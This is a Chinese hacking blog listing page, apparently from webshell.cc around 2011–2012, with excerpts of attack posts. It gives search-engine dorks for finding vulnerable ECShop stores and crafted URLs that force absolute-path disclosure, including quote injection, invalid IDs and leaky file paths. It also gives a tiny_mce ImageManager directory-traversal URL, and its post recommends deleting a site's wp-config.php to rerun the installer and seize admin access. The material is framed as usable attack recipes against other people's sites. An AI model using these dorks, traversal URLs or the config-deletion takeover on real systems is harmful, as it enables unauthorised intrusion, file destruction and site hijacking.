ECShop v2.7.2 wap页面暴路径漏洞

分类:安全 | 2012-02-14 | 撸过 663 次
0人扯谈

谷歌百度一下:

inurl:mobile/goods.php?act=view_img&id=123

搜到后在页面加个&id=5
也就是

https://www.webshell.cc/mobile/goods.php?act=view_img&id=123&id=5

zencart编辑器tiny_mce的爆路径漏洞

分类:安全 | 2012-01-8 | 撸过 797 次
0人扯谈

zencart编辑器tiny_mce的跨目录操作漏洞

分类:安全 | 2012-01-8 | 撸过 512 次
0人扯谈


路径为:http://www.webshell.cc/editors/tiny_mce/plugins/ImageManager/manager.php?b=/home/salehots/public_html/
比较鸡肋,不是所有的网站都有用Tiny_mce,不过放到字典里扫描下还是可以扫出几个的。
可以编辑JPG,当然也可有删除文件的功能。
目前想到的就是删除配置文件,比如博客的配置文件,然后重新建立博客,进后台拿权限。
如图,跳到博客目录里删除wp-config.php

然后打开博客,就出现了开始配置博客的信息。

PHP爆绝对路径方法总结帖

分类:安全 | 2011-10-29 | 撸过 2,022 次
0人扯谈

1、单引号爆路径

说明:

直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。

Eg:

http://www.webshell.cc/news.php?id=149'

截图:

 

 

2、错误参数值爆路径

说明:

将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。

Eg:

https://www.webshell.cc/researcharchive.php?id=-1

截图:

 

 

3、Google搜路径

说明:

结合关键字和site语法搜索出错页面的网页快照[......]

继续阅读

ecshop的48个泄露网站路径漏洞

分类:安全 | 2011-10-27 | 撸过 620 次
0人扯谈

http://www.webshell.cc/shop/api/cron.php
https://www.webshell.cc/shop/wap/goods.php
https://www.webshell.cc/shop/temp/compiled/ur_here.lbi.php
https://www.webshell.cc/shop/temp/compiled/pages.lbi.php
https://www.webshell.cc/shop/temp/compiled/user_transaction.dwt.php
https://www.webshell.cc/shop/temp/com[......]

继续阅读